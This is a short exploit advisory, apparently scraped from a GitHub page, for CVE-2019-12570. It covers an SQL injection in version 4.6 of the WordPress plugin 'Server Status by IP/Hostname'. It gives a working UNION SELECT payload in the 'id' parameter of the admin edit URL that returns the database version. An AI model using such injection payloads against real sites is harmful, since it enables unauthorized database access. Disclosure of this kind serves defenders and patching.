Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: SQLi in "Server Status by IP/Hostname"
# Date: 18.06.2019
# Exploit Author: Ihor Voschyk, mentored by Semen Alexandrovich Lyhin
# Vendor Homepage: https://xpertsol.org/
# Software Link: https://fr-be.wordpress.org/plugins/server-status-by-hostnameip/
# Version: 4.6
# CVE-2019-12570
In "server status by hostname" plugin it is possible to inject arbitrary SQL queries when changing servers properties.
For this, an attacker should go to "All Servers" and click "Edit" on any of the servers. For instance,"id" parameter can be changed so the URI will look like this:
http://127.0.0.1/cve/wordpress/wp-admin/admin.php?page=all-servers&id=2+UNION+SELECT+1%2C2%2C3%2C%40%40version+&action=edit
This will trigger the DB to return DBMS version in the page body within the "IP/Hostname" field.